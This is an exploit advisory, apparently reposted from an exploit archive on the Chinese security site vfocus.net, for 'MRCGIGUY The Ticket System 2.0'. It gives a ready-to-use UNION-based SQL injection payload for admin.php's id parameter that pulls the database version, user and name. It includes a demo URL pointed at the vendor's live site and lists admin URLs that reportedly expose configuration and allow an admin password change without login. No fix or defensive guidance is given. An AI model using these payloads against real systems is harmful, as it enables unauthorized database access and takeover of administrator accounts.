首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MRCGIGUY The Ticket System 2.0 PHP Multiple Remote Vulnerabilities
来源:vfocus.net 作者:vfocus 发布时间:2009-06-10  
MRCGIGUY The Ticket System 2.0 PHP(id) Multiple Remote Vulnerabilities
Founder: ThE g0bL!N
------
Home: http:/www.4ckx.com/dz/
----
Vendor:http://www.mrcgiguy.com
Special Thx:  All Muslims All Members Of Team Algerien Of FootBall
Note: Algerie 3-1 Egypt
Exploit:
------
SQL INJECTION:
-------------
http://wwww.victim.com/admin.php?action=viewticket&id=[ SQL CODE]
[ SQL CODE]=498+union+select+1,version(),3,4,user(),6,database(),8,9,10,11,12--
Demo:
----
http://www.mrcgiguy.com/tts/admin.php?action=viewticket&id=498+union+select+1,version(),3,4,user(),6,database(),8,9,10,11,12--
Note : The exploit Worked out of enter The Right information of admin :)
2) Config Information Disclousr: (out of cookies)
--------------------------------------------------
go to url:
---------
http://victim/tts/admin.php?action=editconfig
Admin Change Password:
*--------------------
http://victim.com/path/admin.php?action=editop&id=1

# [2009-06-09]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Free Download Manager 2.5/3.0
·MRCGIGUY Hot Links (report.php
·S-CMS <= 2.0b3 (username) Blin
·Joomla Component com_realestat
·S-CMS <= 2.0b3 Multiple SQL In
·Joomla Component com_vehiclema
·S-CMS <= 2.0b3 Multiple Local
·phpMyAdmin (/scripts/setup.php
·Joomla Component com_media_lib
·Joomla Component Akobook 2.3 (
·DX Studio Player < 3.0.29.1 Fi
·windows xp/sp1 generate portbi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved